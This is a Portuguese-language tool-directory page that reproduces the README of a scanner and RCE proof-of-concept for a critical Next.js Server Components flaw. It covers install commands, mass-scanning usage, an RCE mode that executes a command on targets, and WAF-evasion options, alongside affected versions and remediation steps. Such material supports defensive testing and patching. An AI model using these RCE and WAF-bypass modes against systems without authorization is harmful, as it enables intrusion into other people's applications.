Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC2-CVE-2025-55182 — Scanner de vulnerabilidades multimodo para Next.js RCE (CVE-2025-66478/55182) com detecção segura de canal lateral, prova de conceito de RCE, técnicas de bypass de WAF e varredura de dependências de projetos locais. | Kitploit
Ferramentas/GitHubGitHub/iamblacksolo2-bugbounty/poc2-cve-2025-55182
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebBypass de WAFTestes de Penetração
GitHubiamblacksolo2-bugbounty/poc2-cve-2025-55182

POC2-CVE-2025-55182

Scanner de vulnerabilidades multimodo para Next.js RCE (CVE-2025-66478/55182) com detecção segura de canal lateral, prova de conceito de RCE, técnicas de bypass de WAF e varredura de dependências de projetos locais.

Ver Repositório
4há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

React2Shell Ultimate - Scanner CVE-2025-66478

CVE-2025-66478 CVE-2025-55182 CVSS 10.0 Python 3.7+ MIT License

O scanner mais abrangente para a vulnerabilidade de Execução Remota de Código do Next.js RSC

root@kitploit:~
╔════════════════════════════════════════════════════════════════════════╗
║     ____                 _   ___  ____  _          _ _                 ║
║    |  _ \ ___  __ _  ___| |_|__ \/ ___|| |__   ___| | |                ║
║    | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | |                ║
║    |  _ <  __/ (_| | (__| |_ / /_ ___) | | | |  __/ | |                ║
║    |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_|                ║
║                                                                        ║
║            React2Shell Ultimate CVE-2025-66478 Scanner v1.0.0         ║
║          Next.js RSC Remote Code Execution Vulnerability               ║
╠════════════════════════════════════════════════════════════════════════╣
║                                                                        ║
║                                                                        ║
╠════════════════════════════════════════════════════════════════════════╣
║  Modos: --safe (side-channel) | --rce (PoC) | --version | --local      ║
║  Bypass de WAF: --waf-bypass | --vercel-bypass | --unicode                ║
╚════════════════════════════════════════════════════════════════════════╝

🚨 Visão Geral da Vulnerabilidade

CVE-2025-66478 (também conhecida como CVE-2025-55182) é uma vulnerabilidade CRÍTICA (CVSS 10.0) de Execução Remota de Código que afeta aplicações Next.js que utilizam React Server Components (RSC).

Versões Afetadas

Faixa de VersãoStatus
Next.js 15.0.0 - 15.0.4⚠️ Vulnerável
Next.js 15.1.0 - 15.1.8⚠️ Vulnerável
Next.js 15.2.0 - 15.2.5⚠️ Vulnerável
Next.js 15.3.0 - 15.3.5⚠️ Vulnerável
Next.js 15.4.0 - 15.4.7⚠️ Vulnerável
Next.js 15.5.0 - 15.5.6⚠️ Vulnerável
Next.js 16.0.0 - 16.0.6⚠️ Vulnerável
Next.js 14.3.0-canary.77+⚠️ Vulnerável
Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+✅ Corrigida
Next.js 16.0.7+✅ Corrigida
Next.js 13.x, 14.x estável✅ Não Afetada

✨ Funcionalidades

Esta ferramenta combina as melhores características de múltiplos scanners do CVE-2025-66478:

FuncionalidadeDescrição
🔍 Detecção Multi-ModoCanal lateral seguro, PoC de RCE, apenas versão, escaneamento local
🛡️ Técnicas de Bypass de WAFPreenchimento com lixo, codificação Unicode, bypass específico para Vercel
📁 Escaneamento de Projetos LocaisVerifica package.json, lockfiles por dependências vulneráveis
⚡ Alto DesempenhoEscaneamento multi-thread com concorrência configurável
📊 Múltiplos Formatos de SaídaConsole, JSON, exportação para arquivo
🎯 Detecção Precisa de VersãoCabeçalhos HTTP, impressão digital RSC, consciência de versões corrigidas

🚀 Instalação

root@kitploit:~
# Clone o repositório
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate

# Instale as dependências
pip install -r requirements.txt

# Ou instale manualmente
pip install requests tqdm

📖 Uso

Escaneamento Básico

root@kitploit:~
# Apenas detecção de versão (mais rápido, sem exploração)
python3 react2shell-ultimate.py -u https://alvo.com --version

# Detecção segura por canal lateral (sem execução de código)
python3 react2shell-ultimate.py -u https://alvo.com --safe

# Prova de conceito de RCE (executa cálculo inofensivo: 41*271=11111)
python3 react2shell-ultimate.py -u https://alvo.com --rce

# Escaneamento abrangente com todas as tentativas de bypass
python3 react2shell-ultimate.py -u https://alvo.com --comprehensive

Escaneamento em Massa

root@kitploit:~
# Escaneia múltiplos alvos de um arquivo
python3 react2shell-ultimate.py -l alvos.txt -t 20 -o resultados.json

# Modo silencioso - mostra apenas hosts vulneráveis
python3 react2shell-ultimate.py -l alvos.txt -q

# Saída JSON para stdout
python3 react2shell-ultimate.py -l alvos.txt --json

Escaneamento de Projetos Locais

root@kitploit:~
# Escaneia o diretório atual
python3 react2shell-ultimate.py --local .

# Escaneia um caminho de projeto específico
python3 react2shell-ultimate.py --local /caminho/para/projetos/nextjs

Técnicas de Bypass de WAF

root@kitploit:~
# Bypass com lixo (adiciona 128KB de preenchimento para evadir inspeção de conteúdo)
python3 react2shell-ultimate.py -u https://alvo.com --rce --waf-bypass

# Tamanho personalizado do lixo
python3 react2shell-ultimate.py -u https://alvo.com --rce --waf-bypass --waf-bypass-size 256

# Bypass com codificação Unicode
python3 react2shell-ultimate.py -u https://alvo.com --rce --unicode

# Bypass específico para Vercel
python3 react2shell-ultimate.py -u https://alvo.com --rce --vercel-bypass

# Alvo Windows (payload PowerShell)
python3 react2shell-ultimate.py -u https://alvo.com --rce --windows

Opções Avançadas

root@kitploit:~
# Com proxy
python3 react2shell-ultimate.py -u https://alvo.com --rce --proxy http://127.0.0.1:8080

# Cabeçalhos personalizados
python3 react2shell-ultimate.py -u https://alvo.com --rce -H "Authorization: Bearer token"

# Timeout aumentado
python3 react2shell-ultimate.py -u https://alvo.com --rce --timeout 30

# Saída detalhada
python3 react2shell-ultimate.py -u https://alvo.com --comprehensive -v

📋 Opções de Linha de Comando

OpçãoDescrição
-u, --urlURL única para verificar
-l, --listArquivo contendo URLs (uma por linha)
--localEscaneia diretório de projeto local
--safeDetecção segura por canal lateral (sem RCE)
--rceModo de prova de conceito de RCE
--versionApenas detecção de versão
--comprehensiveEscaneamento completo com todas as técnicas
--waf-bypassAdiciona lixo para bypass de WAF
--waf-bypass-sizeTamanho do lixo em KB (padrão: 128)
--unicodeCodificação Unicode para bypass de WAF
--vercel-bypassBypass específico para Vercel
--windowsUsa payload do PowerShell do Windows
-t, --threadsThreads concorrentes (padrão: 10)
--timeoutTimeout da requisição em segundos (padrão: 10)
-k, --insecureDesabilita verificação SSL
--proxyURL do proxy (http://host:porta)
-H, --headerCabeçalho personalizado (repetível)
-o, --outputArquivo de saída (JSON)
--all-resultsSalva todos os resultados, não apenas vulneráveis
-v, --verboseSaída detalhada
-q, --quietMostra apenas hosts vulneráveis
--jsonSaída JSON para stdout
--no-colorDesabilita saída colorida

🔬 Métodos de Detecção

1. Detecção Segura por Canal Lateral (--safe)

Dispara um padrão específico de resposta de erro sem executar código. Identifica implementações RSC vulneráveis através do comportamento de tratamento de erros.

2. Prova de Conceito de RCE (--rce)

Executa um cálculo matemático inofensivo (echo $((41*271)) = 11111) para confirmar a capacidade de RCE. O resultado aparece no cabeçalho X-Action-Redirect.

3. Detecção de Versão (--version)

  • Verifica o cabeçalho X-Powered-By pela versão do Next.js
  • Analisa o cabeçalho Vary por indicadores RSC
  • Sonda endpoints RSC por respostas text/x-component
  • Examina o código-fonte da página por impressões digitais do Next.js

4. Escaneamento Local (--local)

Verifica diretórios de projeto por:

  • package.json - Declaração de dependência direta
  • package-lock.json - Lockfile do NPM
  • yarn.lock - Lockfile do Yarn
  • pnpm-lock.yaml - Lockfile do PNPM
  • bun.lockb - Lockfile do Bun

📊 Exemplos de Saída

Saída no Console

root@kitploit:~
[VULNERÁVEL] https://alvo.com
    Versão: 15.3.1 | Status: 200 | Método: rce_poc
    Bypass de WAF: SUCESSO

[NÃO VULNERÁVEL] https://alvo-seguro.com
    Versão: 15.5.7 | Status: 200 | Método: http_headers

[BLOQUEADO POR WAF] https://protegido.com
    Versão: 15.2.0 | Status: 403 | Método: rce_poc
    WAF Detectado: Exploração bloqueada

Saída JSON

root@kitploit:~
{
  "tool": "React2Shell Ultimate CVE-2025-66478 Scanner",
  "version": "1.0.0",
  "cve_ids": ["CVE-2025-55182", "CVE-2025-66478"],
  "scan_time": "2025-12-06T12:00:00Z",
  "total_results": 1,
  "results": [
    {
      "url": "https://target.com",
      "vulnerable": true,
      "version": "15.3.1",
      "status_code": 200,
      "detection_method": "rce_poc",
      "waf_detected": false,
      "waf_bypassed": false
    }
  ]
}

🛡️ Remediação

Se você encontrar aplicações vulneráveis:

  1. Atualize imediatamente para versões corrigidas:

    • Next.js 15.x → Atualize para 15.5.7+ (ou o patch da sua versão menor)
    • Next.js 16.x → Atualize para 16.0.7+
  2. Mitigações temporárias:

    • Use Edge Runtime em vez de Node.js runtime
    • Desabilite Server Actions se não forem necessárias
    • Implemente atrás de um WAF com detecção de payload RSC
  3. Monitore logs por tentativas de exploração

📚 Referências

  • Aviso de Segurança do Next.js - CVE-2025-66478
  • Pesquisa Assetnote - React2Shell
  • NVD - CVE-2025-66478

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais.

  • Escaneie apenas sistemas para os quais você tem permissão explícita para testar
  • O modo PoC de RCE executa código nos sistemas alvo (cálculo inofensivo)
  • Acesso não autorizado a sistemas de computadores é ilegal
  • O autor não é responsável pelo uso indevido desta ferramenta

📄 Licença

Licença MIT - Consulte o arquivo LICENSE para detalhes.


⭐ Dê uma estrela neste repositório se achar útil! ⭐

Baixar ferramenta